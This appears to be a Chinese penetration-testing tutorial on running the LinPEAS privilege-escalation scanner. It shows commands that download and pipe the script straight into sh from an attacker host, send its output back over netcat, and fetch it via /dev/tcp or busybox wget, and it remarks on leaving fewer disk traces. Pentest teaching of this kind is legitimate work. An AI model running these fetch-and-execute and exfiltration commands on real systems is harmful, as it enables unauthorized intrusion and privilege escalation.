LinPEAS 使用最佳实践指南
在渗透测试和权限提升评估中,LinPEAS(Linux Privilege Escalation Awesome Script)是⼀个⽤来搜索类unix主机上可能的提权路径的⾃动化脚本。本文将介绍使用 LinPEAS 的最佳实践方案,并针对不同环境(如无 curl 的情况)提供替代方案。
一、最佳实现方案
在受控测试环境中,我们可以使用 curl 下载 LinPEAS 并直接执行,同时将扫描结果回传至攻击机进行分析。这种方式的主要优点是快速、高效,并且由于通过数据流直接传输,减少了磁盘痕迹。
1. 远程主机准备工作
在攻击机(假设 IP 为 192.168.56.100)上,我们需要:
- 运行一个 HTTP 服务器以提供 LinPEAS
- 监听端口接收 LinPEAS 的扫描结果
步骤 1:开启 HTTP 服务器(提供 LinPEAS)
python -m http.server 80
或者使用 busybox:
busybox httpd -f -p 80
步骤 2:开启 Netcat 监听端口 81,接收 LinPEAS 输出
nc -lnvp 81 | tee linpeas.out
2. 目标主机执行 LinPEAS
目标机上使用 curl 下载并执行 LinPEAS,同时将输出通过 nc 发送回攻击机:
curl -s 192.168.56.100/linpeas.sh | sh | nc 192.168.56.100 81
说明
curl -s 192.168.56.100/linpeas.sh:静默下载| sh:通过管道立即传递给 sh 解释执行| nc 192.168.56.100 81:将结果传输回攻击机
3. 远程主机查看结果
在攻击机上,可以使用 less 解析 linpeas.out 文件:
less -r linpeas.out
其中 -r ( --raw-control-chars ) 选项可以正确显示颜色格式,以便更清晰地查看 LinPEAS 结果。
二、无 curl 解决方案
在某些受限环境中,目标机可能没有 curl 或者 wget,此时可以使用以下替代方案。
方法 1:使用 /dev/tcp 直接获取 LinPEAS
如果 bash 版本支持 /dev/tcp,可以使用:
cat < /dev/tcp/192.168.56.100/80 | sh
说明
/dev/tcp/192.168.56.100/80是 bash 内置的功能,直接与远程 HTTP 服务器通信cat读取 LinPEAS 并传递给sh执行
方法 2:使用 scp 传输 busybox
如果目标机没有 curl,可以通过 scp 传输 busybox,然后利用 busybox 提供 wget 或 nc:
scp busybox 目标机:/tmp/
ssh 目标机
cd /tmp/
chmod +x busybox
./busybox wget http://192.168.56.100/linpeas.sh
sh linpeas.sh | nc 192.168.56.100 81
说明
busybox是一个精简的 Unix 工具集合,包含wget、nc等工具- 目标机下载
linpeas.sh后手动执行并传输结果
三、总结
| 方法 | 适用场景 | 依赖项 | 备注 |
|---|---|---|---|
curl 方式 | 目标机有 curl | curl, nc | 推荐方案,简单高效 |
/dev/tcp 方式 | 目标机无 curl,但 bash 支持 /dev/tcp | bash | 适用于受限环境 |
scp + busybox | 目标机无 curl,但有 scp | scp, busybox | 需要先传输 busybox |
在渗透测试过程中,根据目标环境的实际情况选择合适的方法,可以更高效地执行 LinPEAS 进行权限提升评估。
相关文章:
LinPEAS 使用最佳实践指南
在渗透测试和权限提升评估中,LinPEAS(Linux Privilege Escalation Awesome Script)是⼀个⽤来搜索类unix主机上可能的提权路径的⾃动化脚本。本文将介绍使用 LinPEAS 的最佳实践方案,并针对不同环境(如无 curl 的情况&…...
c++介绍智能指针 十二(1)
普通指针:指向内存区域的地址变量。使用普通指针容易出现一些程序错误。 如果一个指针所指向的内存区域是动态分配的,那么这个指针变量离开了所在的作用域,这块内存也不会自动销毁。动态内存不进行释放就会导致内存泄露。如果一个指针指向已…...
Vue的scoped原理是什么?
scoped的工作原理 当在 <style> 标签上使用 scoped 属性时,Vue 会为当前组件的每个元素添加一个唯一的 data-v-xxxxxx 属性,并将样式规则中的选择器修改为包含该属性的形式。 编译阶段: 在编译 .vue 文件时,Vue 的编译器…...
的概念和应用场景,并实现一个简单的 HOC。)
大白话解释 React 中高阶组件(HOC)的概念和应用场景,并实现一个简单的 HOC。
高阶组件(HOC)的概念 在 React 里,高阶组件(Higher-Order Component,简称 HOC)就像是一个“超级工厂函数”。它本身是一个函数,而且这个函数接收一个组件作为参数,然后返回一个新的…...
深入浅出C++ STL:统领STL全局
深入浅出C STL:统领STL全局 深入浅出C STL:统领STL全局github主页地址前言一、STL的前世今生1.1 什么是STL?1.2 STL版本演进 二、STL六大核心组件详解2.1 容器(Containers)容器性能对照表 2.2 算法(Algorit…...
)
k8s面试题总结(十五)
1.如何使用Kubernetes进行多环境部署(如开发,测试和生产环境)? 使用命名空间(namespaces): 命名空间是用于逻辑隔离和资源分组的一种方式,可以为每个环境创建单独的命名空间。 2.使…...
Appium等待机制--强制等待、隐式等待、显式等待
书接上回,Appium高级操作--其他操作-CSDN博客文章浏览阅读182次,点赞6次,收藏7次。书接上回Appium高级操作--从源码角度解析--模拟复杂手势操作-CSDN博客。https://blog.csdn.net/fantasy_4/article/details/146162851主要讲解了Appium的一些…...
Vue源码深度解析:从2.x到3.x的架构演进与核心原理剖析
Vue源码深度解析:从2.x到3.x的架构演进与核心原理剖析 一、框架演变:从Vue2到Vue3的跨越 1.1 革命性升级 Vue3的发布标志着前端框架进入新纪元,其核心改进体现在三个方面: 性能飞跃:包体积减少41%,初始…...
计算机视觉cv2入门之图像的读取,显示,与保存
在计算机视觉领域,Python的cv2库是一个不可或缺的工具,它提供了丰富的图像处理功能。作为OpenCV的Python接口,cv2使得图像处理的实现变得简单而高效。 示例图片 目录 opencv获取方式 图像基本知识 颜色空间 RGB HSV 图像格式 BMP格式 …...
前置机跟服务器的关系
在复杂的IT系统架构中,前置机与服务器的协同配合是保障业务高效、安全运行的关键。两者的关系既非简单的上下级,也非独立个体,而是通过功能分层与职责分工,构建起一套既能应对高并发压力、又能抵御安全风险的弹性体系。 在当今复…...
,$emit触发父事件/.sync修饰符双向绑定)
【Vue】el-dialog的2种封装方法(父子组件双向通信),$emit触发父事件/.sync修饰符双向绑定
🤵 作者:coderYYY 🧑 个人简介:前端程序媛,目前主攻web前端,后端辅助,其他技术知识也会偶尔分享🍀欢迎和我一起交流!🚀(评论和私信一般会回!!) 👉 个人专栏推荐:《前端项目教程以及代码》 前言 在现代Vue.js开发中,el-dialog组件作为ElementUI库中的一个…...
(1_坐标变换_C++)(先输入再计算;边输入边计算))
CCF CSP 第30次(2023.09)(1_坐标变换_C++)(先输入再计算;边输入边计算)
CCF CSP 第30次(2023.09)(1_坐标变换_C) 题目描述:输入格式:输出格式:样例输入:样例输出:样例解释:子任务:解题思路:思路一࿰…...
【QT】事件系统入门——QEvent 基础与示例
一、事件介绍 事件是 应用程序内部或者外部产生的事情或者动作的统称 在 Qt 中使用一个对象来表示一个事件。所有的 Qt 事件均继承于抽象类 QEvent。事件是由系统或者 Qt 平台本身在不同的时刻发出的。当用户按下鼠标、敲下键盘,或者是窗口需要重新绘制的时候&…...
5-27 临摹大师-IP-Adapter
前言: 前一节我们主要介绍ControlNet中如何对黑白照片进行上色 主要介绍ControlNet中的IP-Adapter。这个也是一种类似的风格借鉴,类似Reference的能力。 当然IP-Adapter有两点或许可以吸引我们,一个是国人腾讯公司制作的。另一个在速度和效…...
Spring MVC面试题(一)
1.什么是Spring MVC? 全称为Model View Controller,Spring MVC是Spring的一个模块,基于MVC架构模式的一个框架 2.Spring MVC优点? 1.可用各种视图技术,不仅限于JSP 2.支持各种请求资源映射策略 3. Spring MVC工作原…...
Unity开发的抖音小游戏接入抖音开放平台中的流量主(抖音小游戏接入广告)
前言:作者在进行小游戏审核版本的过程中,碰到了下列问题,所以对这个抖音小游戏接入广告研究了下。 还有就是作者的TTSDK版本号是6.2.6,使用的Unity版本是Unity2022.3.29f1,最好和作者的两个版本号保持一致,因为我发现TTSDK旧版的很多函数在新版中就已经无法正常使用了,必…...
统一 Elastic 向量数据库与 LLM 功能,实现智能查询
作者:来自 Elastic Sunile Manjee 利用 LLM 功能进行查询解析,并使用 Elasticsearch 搜索模板,将复杂的用户请求转换为结构化的、基于模式的搜索,从而实现高精度查询结果。 想象一下,你在搜索“距离 Belongil Beach 25…...
[操作系统] 学校课程关于“静态优先级抢占式调度“作业
今天我们来分享两道题目哈, 学校弄得题目. T1: 静态优先级, 抢占式(1为高优先级) 图解: 以下是静态优先级抢占式调度的解题过程和结果: 解题思路: 优先级规则: 数值越小优先级越高。新进程到达时,若其优先级高于当前运行进程&…...
【SpringBoot】MD5加盐算法的详解
目录 一、什么是加盐算法 二、如何实现加盐算法 2.1 加盐算法代码实现 2.2 注册页面中进行密码加盐 2.3 登录页面进行加盐的解密 2.4 注册和登录 一、什么是加盐算法 加盐算法是一种用于增强密码安全性的技术。这种技术通过在密码存储过程中添加一个随机生成的盐值&…...
)
kotlin与MVVM结合使用总结(一)
一、Kotlin 与 MVVM 结合的核心优势 代码简洁性 数据类(data class)简化 Model 层定义,自动生成equals/hashCode/toString扩展函数简化 View 层逻辑(如点击事件扩展)lateinit/by lazy优化 ViewModel 属性初始化 异步处…...
累计完工数量达到了xxxx超过了最大可完工数量xxxx
之前解决过一次,没有记录下来,不记得发生什么事情。又浪费几个小时去分析问题。这次的经历有点痛苦,碰上多表关连数据的勾稽。分析是河南用户的非法操作造成的。没有领料记录入不了库,跨月了。财务要求删单处理。删单之后…...
飞鸟与鱼不同路
看,好美的太阳。 正是因为有人看才会觉得美,若无人问津,美又从何而来。 嘿嘿,今天提出辞去综合教研室主任一职,不想在这个管理上废时间啦~ 把时间用来考试.........用来做自己的事情,花在自己的身上&…...
若依RuoYi-Cloud-Plus微服务版(完整版)前后端部署
一.目标 在浏览器上成功登录进入 二.源码下载 后端源码:前往Gitee下载页面(https://gitee.com/dromara/RuoYi-Cloud-Plus)下载解压到工作目录。 前端源码: 前往Gitee下载页面(https://gitee.com/JavaLionLi/plus-ui)下载解压到工作目录。 文档地址&a…...
【redis】list类型:基本命令(下)
文章目录 LLENLREMLTRIMLSET阻塞版本命令BLPOP 和 BRPOP区别使用方式 命令小结内部编码 LLEN 获取 list 的长度 语法: LLEN key时间复杂度: O ( 1 ) O(1) O(1)返回值: list 长度 LREM 删除 count 个 key 中的元素 语法: LREM…...
【数据挖掘】知识蒸馏(Knowledge Distillation, KD)
1. 概念 知识蒸馏(Knowledge Distillation, KD)是一种模型压缩和知识迁移技术,旨在将大型复杂模型(称为教师模型)中的知识传递给一个较小的模型(称为学生模型),以减少计算成本&…...
VSCode 搭建C++编程环境 2025新版图文安装教程(100%搭建成功,VSCode安装+C++环境搭建+运行测试+背景图设置)
名人说:博观而约取,厚积而薄发。——苏轼《稼说送张琥》 创作者:Code_流苏(CSDN)(一个喜欢古诗词和编程的Coder😊) 目录 一、VScode下载及安装二、安装 MinGW-w64 工具链三、Windows环境变量配置四、检查 M…...
Ubuntu24.04 LTS 版本 Linux 系统在线和离线安装 Docker 和 Docker compose
一、更换软件源并更新系统 在 Ubuntu 24.04 LTS 中,系统引入了全新的软件源配置格式。现在的源配置文件内容更加结构化且清晰,主要包含了软件类型 (Types)、源地址 (URIs)、版本代号 (Suites) 以及组件 (Components) 等信息。 # cat /etc/apt/sources.li…...
从 pip 到 Poetry:开启高效 Python 包管理新时代
目录 从 pip 到 Poetry:开启高效 Python 包管理新时代 一、pip 与 Poetry 的基本区别 二、Poetry 相对于 pip 的优势 1. 依赖管理与版本锁定 2. 内置虚拟环境管理 3. 统一的项目管理流程 4. 精细的依赖解析器 5. 更友好的 CLI 工具 三、如何快速上手 Poetry…...
MTK Android12 最近历史任务 最左侧的清除历史任务改到页面底部
Android最近历史任务页面 -清除所有- 功能按钮放到底部 文章目录 需求需求原因 修改的核心文件实现方案最近历史任务基本UI结构了解代码实现思路实现方案RecentsViewTaskOverlayFactory在overview_actions_containerOverviewActionsView 实际效果 总结 需求 最近历史任务重&am…...
TCP协议支持全双工原因TCP发送接收数据是生产者消费者模型
一、TCP支持全双工的原因 TCP协议支持全双工,即使用TCP协议进行通信时,服务端和客户端可以同时进行数据的发送和接收,互不干扰,实现同时双向传输数据。 这是因为使用TCP协议通信时,读写套接字的文件描述符既用来发送…...